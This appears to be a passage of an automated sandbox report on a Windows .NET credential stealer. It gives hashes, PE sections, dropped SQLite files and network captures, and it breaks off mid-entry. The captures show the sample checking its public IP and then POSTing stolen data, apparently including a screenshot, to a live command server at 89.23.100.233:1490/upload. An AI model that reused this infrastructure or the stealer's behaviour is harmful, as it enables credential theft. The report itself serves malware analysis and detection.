                                          Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\tmp919E.tmp.dat

                                          Download File
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):1.4026573159402624
                                          Encrypted:false
                                          SSDEEP:48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
                                          MD5:F49DFF163167A43F4940B7337A092C07
                                          SHA1:1A8BAAC92537FA0BD39063D17C3072AD86190CC4
                                          SHA-256:B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
                                          SHA-512:BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\tmp919F.tmp.dat

                                          Download File
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                          Category:dropped
                                          Size (bytes):135168
                                          Entropy (8bit):1.0873605234887023
                                          Encrypted:false
                                          SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                          MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                          SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                          SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                          SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Windows\appcompat\Programs\Amcache.hve

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):2359296
                                          Entropy (8bit):4.361358938038657
                                          Encrypted:false
                                          SSDEEP:49152:q1AhNXBlw3Ak2BGUM5Dc0Uag6nSz8a8aO:z
                                          MD5:40701DFEB060178BEA0216F2A1202E85
                                          SHA1:E866FC61A6E098188E78E8FA63998E2ABF2210B9
                                          SHA-256:6FA4F0CE535D18AC4A5C653CBC34719D27ADB661B24F72363008292019B10230
                                          SHA-512:F0F01789A8EA7621407492FCF4CAED1A1A3D1FFE96EA33CBA2715746CB872C88CB5904896CE022B6696DFFED0F06E4F2D221C990C36FCEEBE56511A437FC3639
                                          Malicious:false
                                          Preview:regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm..c..Q..............................................................................................................................................................................................................................................................................................................................................R..<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):4.646001791237352
                                          Encrypted:false
                                          SSDEEP:768:rqQyP8n92v+FS8YTAbCRlLlPSRy2uiruMxYVd8dMwW2G2P5fRFrsJpyG2gKOrndh:mdik9CuiruRKxRFrsJdNYPiigyf
                                          MD5:6AD26ECFF37D20F0626FC381E9E82B57
                                          SHA1:7B758121BB0001DD015408BAD6EB8340676513B2
                                          SHA-256:FBB6FDB0FE256EF5B68F010379C2A4130C55483051391F955D3CD398A0C9A51E
                                          SHA-512:5BF093045BBEB07F04902620CE7FD1BA92598AD1AFB279704FCEC81E65AE0FE9886948C6AC7BA70DC239A15CCEB0CCFD10475BEF96B458D38D87AC139DF36B99
                                          Malicious:false
                                          Preview:regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm..c..Q..............................................................................................................................................................................................................................................................................................................................................T..<HvLE..............!......9..........Kd....................... ... .......p...............................P.......p.......................`... ..........................hbin................5.#.^...........nk,....S.......H.......................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk .....9......(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.381035863719706
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                          • Win32 Executable (generic) a (10002005/4) 49.96%
                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:bPkG0wTVon.exe
                                          File size:3'084'288 bytes
                                          MD5:36274aefe69f86532cee326b878f06ff
                                          SHA1:6a33fb45bfa496c8559947640ae044b1d78d39b8
                                          SHA256:24616a11af126a9d80991d575949abcef8b0e30b816a1ddc3e1d0f63fe380e89
                                          SHA512:d166256935a99047ab55fa0d7c613435f2bd3afc5369dabb45f7866622a171d078a1c92f97f5fb7334466221d9dc9a2e295a778d8c22c81e666db271e3b63d42
                                          SSDEEP:49152:wRAJl5aVqggHv4KAOV6AEnSgRIgtZMZKYTMFOZPNF2fdMrngQQ:wsvJAKR4AEnFIe8KYTYCN02rnzQ
                                          TLSH:17E5CF1836DCAD51D9BB1339D4A000F8D6F27B01B692DBABA92873D52F0E3847E1D257
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bg................................. ... ....@.. ......................../...........`................................

                                          File Icon

                                          Icon Hash:90cececece8e8eb0

                                          Static PE Info

                                          General

                                          Entrypoint:0x4f1ee6
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x6762DFC3 [Wed Dec 18 14:44:19 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [004F1EF4h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          enter 0F1Eh, 00h
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          ret
                                          fbld [edx+67h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add al, byte ptr [eax]
                                          add byte ptr [eax], al
                                          pop edx
                                          add byte ptr [eax], al
                                          add byte ptr [eax], bl
                                          pop ds
                                          ltr word ptr [eax]
                                          add dword ptr [edi], ecx
                                          add byte ptr [edx+53h], dl
                                          inc esp
                                          push ebx
                                          punpcklwd mm4, mm1
                                          xchg eax, esp
                                          xchg eax, ebx
                                          loope 00007F6FECBB9E8Ah
                                          inc edx
                                          mov dl, FFh
                                          mov ecx, 0DBD3E20h
                                          sbb eax, 00000001h
                                          inc ebx
                                          cmp bl, byte ptr [ebp+edx*2+73h]
                                          jc 00007F6FECBB9E96h
                                          pop esp
                                          push edx
                                          popad
                                          imul esp, dword ptr [esi+6Fh], 6F735C6Eh
                                          jne 00007F6FECBB9E94h
                                          arpl word ptr [ebp+5Ch], sp
                                          jc 00007F6FECBB9E87h
                                          jo 00007F6FECBB9E91h
                                          jnc 00007F6FECBB9E7Eh
                                          inc ecx
                                          jc 00007F6FECBB9E85h
                                          popad
                                          outsb
                                          popad
                                          pop esp
                                          inc ecx
                                          jc 00007F6FECBB9E85h
                                          popad
                                          outsb
                                          popad
                                          pop esp
                                          bound ebp, dword ptr [ecx+6Eh]
                                          pop esp
                                          push edx
                                          insb
                                          popad
                                          jnc 00007F6FECBB9E87h
                                          pop esp
                                          inc ecx
                                          jc 00007F6FECBB9E85h
                                          popad
                                          outsb
                                          popad
                                          jo 00007F6FECBB9E87h
                                          bound eax, dword ptr [eax]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xf1e980x4c.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2f40000x596.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f60000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xf1efc0x1c.text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0xf1ef40x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x29e4500x48."@W
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xeff720xf00003e94d5bae1d0bb960c8f5f28afe5203dFalse0.7792093912760417data7.540602371038387IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .\C30xf20000x18465f0x1848002aa325b1d86903a44633411c262b0663False0.7537881073037324COM executable for DOS7.349314887296056IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          ."@W0x2780000x7bb700x7bc0051bb4349e5e634be3720f66baf47f03cFalse0.4955531881313131OpenPGP Secret Key6.421264542672329IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0x2f40000x5960x6000526fa3a22a873f725c4c611e71e0f25False0.4140625data4.035639834367624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x2f60000xc0x200b66d2ab5fddf98e5b0436566a1645f55False0.048828125data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0x2f40900x30cdata0.4282051282051282
                                          RT_MANIFEST0x2f43ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-12-19T08:26:14.011328+01002843856ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M21192.168.11.204971889.23.100.2331490TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 19, 2024 08:26:06.445286989 CET4971780192.168.11.20104.16.184.241
                                          Dec 19, 2024 08:26:06.580420017 CET8049717104.16.184.241192.168.11.20
                                          Dec 19, 2024 08:26:06.581130981 CET4971780192.168.11.20104.16.184.241
                                          Dec 19, 2024 08:26:06.581495047 CET4971780192.168.11.20104.16.184.241
                                          Dec 19, 2024 08:26:06.716522932 CET8049717104.16.184.241192.168.11.20
                                          Dec 19, 2024 08:26:06.724498034 CET8049717104.16.184.241192.168.11.20
                                          Dec 19, 2024 08:26:06.767455101 CET4971780192.168.11.20104.16.184.241
                                          Dec 19, 2024 08:26:12.728980064 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.006740093 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.007004023 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.007729053 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.008251905 CET4971780192.168.11.20104.16.184.241
                                          Dec 19, 2024 08:26:13.143769026 CET8049717104.16.184.241192.168.11.20
                                          Dec 19, 2024 08:26:13.143893957 CET4971780192.168.11.20104.16.184.241
                                          Dec 19, 2024 08:26:13.297394037 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.299988985 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.300641060 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.300703049 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.300715923 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.577130079 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.577871084 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.578089952 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.578293085 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.586378098 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.586579084 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.596863985 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.597089052 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.608768940 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.608942032 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.620646954 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.620863914 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.632344961 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.632627010 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.642873049 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.643040895 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.654126883 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.654298067 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.654444933 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.855703115 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.855884075 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.856054068 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.874448061 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.874665976 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.874838114 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.895879030 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.896064997 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.896236897 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.917874098 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.918060064 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.918205976 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.929316044 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.929516077 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.929688931 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.960870981 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.961025953 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.961199999 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.971740961 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:13.971884012 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:13.972055912 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.011118889 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.011327982 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.011485100 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.033709049 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.033879042 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.034049034 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.046325922 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.046530962 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.046704054 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.133358002 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.133524895 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.133723974 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.152265072 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.152456999 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.152628899 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.176202059 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.176400900 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.176574945 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.198271990 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.198501110 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.198662996 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.213874102 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.214049101 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.214193106 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.231021881 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.231267929 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.231431007 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.252787113 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.252998114 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.253170967 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.274178982 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.274450064 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.274621010 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.307596922 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.307795048 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.317996025 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.351059914 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.372878075 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.396605968 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.419784069 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.447063923 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.468689919 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.489753008 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.530695915 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.530703068 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.559106112 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.582916021 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.602096081 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.623694897 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.634187937 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.656965971 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.691504955 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.702482939 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.725681067 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.758034945 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.769021988 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.791444063 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.812571049 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.823008060 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.834028006 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.857206106 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.889153957 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.912594080 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.923090935 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:17.108047009 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:17.117377043 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:17.117541075 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:17.118180037 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:17.395267963 CET14904971889.23.100.233192.168.11.20

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 19, 2024 08:26:06.289163113 CET5165453192.168.11.201.1.1.1
                                          Dec 19, 2024 08:26:06.430794001 CET53516541.1.1.1192.168.11.20
                                          Dec 19, 2024 08:26:06.748301983 CET6517853192.168.11.201.1.1.1
                                          Dec 19, 2024 08:26:06.889626026 CET53651781.1.1.1192.168.11.20

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Dec 19, 2024 08:26:06.289163113 CET192.168.11.201.1.1.10xee86Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                          Dec 19, 2024 08:26:06.748301983 CET192.168.11.201.1.1.10x99c5Standard query (0)245.246.1.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 19, 2024 08:26:06.430794001 CET1.1.1.1192.168.11.200xee86No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                          Dec 19, 2024 08:26:06.430794001 CET1.1.1.1192.168.11.200xee86No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                          Dec 19, 2024 08:26:06.889626026 CET1.1.1.1192.168.11.200x99c5Name error (3)245.246.1.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • icanhazip.com
                                          • 89.23.100.233:1490

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.11.2049717104.16.184.241808592C:\Users\user\Desktop\bPkG0wTVon.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 19, 2024 08:26:06.581495047 CET63OUTGET / HTTP/1.1
                                          Host: icanhazip.com
                                          Connection: Keep-Alive
                                          Dec 19, 2024 08:26:06.724498034 CET538INHTTP/1.1 200 OK
                                          Date: Thu, 19 Dec 2024 07:26:06 GMT
                                          Content-Type: text/plain
                                          Content-Length: 16
                                          Connection: keep-alive
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: GET
                                          Set-Cookie: __cf_bm=Ih.kLeT7xJIJLONPo36324rSWQHO5fByIjotoIe5cJE-1734593166-1.0.1.1-I0ug7YQ7cA1RmPx594ejG93nbo78gqeNlLQ_ydLKd0J3ZuTfEwUH.VWwEnpkD7ckLP4gjOnnLvqSn0C9s5pHQQ; path=/; expires=Thu, 19-Dec-24 07:56:06 GMT; domain=.icanhazip.com; HttpOnly
                                          Server: cloudflare
                                          CF-RAY: 8f45a99b997832ec-JAX
                                          alt-svc: h3=":443"; ma=86400
                                          Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0a
                                          Data Ascii: 102.129.152.205


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.11.204971889.23.100.23314908592C:\Users\user\Desktop\bPkG0wTVon.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 19, 2024 08:26:13.007729053 CET205OUTPOST /upload HTTP/1.1
                                          Content-Type: multipart/form-data; boundary="6d617208-f1f4-415c-8f95-dec90f8a5da2"
                                          Host: 89.23.100.233:1490
                                          Content-Length: 133579
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Dec 19, 2024 08:26:13.297394037 CET25INHTTP/1.1 100 Continue
                                          Dec 19, 2024 08:26:13.577130079 CET25INHTTP/1.1 100 Continue
                                          Dec 19, 2024 08:26:17.108047009 CET165INHTTP/1.1 200 OK
                                          Server: Werkzeug/3.1.3 Python/3.13.0
                                          Date: Thu, 19 Dec 2024 07:26:16 GMT
                                          Content-Type: application/json
                                          Content-Length: 61
                                          Connection: close


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:02:26:03
                                          Start date:19/12/2024
                                          Path:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\bPkG0wTVon.exe"
                                          Imagebase:0x120000
                                          File size:3'084'288 bytes
                                          MD5 hash:36274AEFE69F86532CEE326B878F06FF
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:02:26:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"cmd.exe" /c tasklist
                                          Imagebase:0x140000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:9
                                          Start time:02:26:05
                                          Start date:19/12/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
